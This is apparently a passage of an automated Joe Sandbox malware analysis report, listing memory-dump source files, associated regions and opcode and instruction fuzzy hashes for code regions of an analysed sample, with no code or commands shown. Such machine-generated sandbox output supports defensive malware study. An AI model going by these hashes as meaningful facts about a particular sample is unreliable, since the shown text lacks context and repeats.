                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction ID: 09491da2ca058f0dd3cd339ca893a997ac71f837760c3f263ec042385ad33321
                                        • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction Fuzzy Hash: D7C14876E29B824BD713863DD802265E795BFE7290F05D72BFCE472982FB2096858244
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction ID: 08f70aad0b8bb011f098146d362fea140f0e85afc23de7b42d67f2403b9ecf36
                                        • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction Fuzzy Hash: 5ED14874600B41CFE725CF29C494BA7BBE0BB49308F14892ED89B8BB51D735E949CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                        • Instruction ID: 98b334ce52bf4846b3a5983b105031996945750be7d19b449c40ec4197df70e0
                                        • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                        • Instruction Fuzzy Hash: FDD12BB01083818FD7158F15D0A872BBFF0BF95708F19895DE4D90B391D7BA8948DBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction ID: 8babfe0e3d181cc368732d4878da2816be2e7744c8a68171cc962feac2a8ae16
                                        • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction Fuzzy Hash: 53B18E72A083519BD308CF25C89176BF7E2FFC8310F1AC93EE89997291D774D9459A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction ID: 70e7e27e416751ab1ffaa5665bb465dad03b7be8702d0c4dc8d75c268f7f4c41
                                        • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction Fuzzy Hash: 96B18172A083515BD308CF25C89179BF7E2FFCC310F1ACA3EA89997291D774D9459A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction ID: 0e42b5e5b0e0a0541439eafa2f0a64a664b3851ba46136f57a5f078b48a319d4
                                        • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction Fuzzy Hash: 03B12A75A097118FE706EE3DC481259F7D1BFE6280F51C72EE8A5B7662E731E8818740
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction ID: 424c176d7fa65b76b9059fc3c4530633ac027233c5944e7059dbb4c587d6f538
                                        • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction Fuzzy Hash: 3491E875A002118BDF15CEA8DCA4BBA7FA0BF56302F194566ED04AB392D331DD0DCBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction ID: c3fb468c839db50f7e7a7dea7437d5d615f20d8a867b5f7856a5420b0db79f0d
                                        • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction Fuzzy Hash: 2CB139316106099FDB19CF28C48AB657FE4FF45364F29865CE899CF2A2C735E992CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction ID: abf24aea96592df5c258fd2521a3d83a628f78d456920fdb3de9ecf1cd575697
                                        • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction Fuzzy Hash: 7BC14A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction ID: c243d90e88f75de14bc19b7f1937b6df5993e3e11dbe65b71229260fe4993b53
                                        • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction Fuzzy Hash: 1F9158319287916AEB168B3CCC417BABBA4FFE7354F14C71AF98872491FB7185818354
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction ID: 3cd4ab7b869819bfbb72c2501335b1fd1f84b9028c23e034ee074845ae7f1a29
                                        • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction Fuzzy Hash: 5BA14172900A19CBEB29CF55CCD1A5EBBB1FB54315F14C22AD81AE73A0D374A945CF60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f72a4e5f599e100efa492e211f5f916eec4db93845f285bf684b0166e4ee993
                                        • Instruction ID: 9886c8a820251f8bbedd517d8c1f4884ec9e435517c1a1b31a6a2c7d816b7c72
                                        • Opcode Fuzzy Hash: 6f72a4e5f599e100efa492e211f5f916eec4db93845f285bf684b0166e4ee993
                                        • Instruction Fuzzy Hash: C181D7F3E086149FF3045E24DC4577AB7E2EBD4320F1A893DDAC897790D63A88458786
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
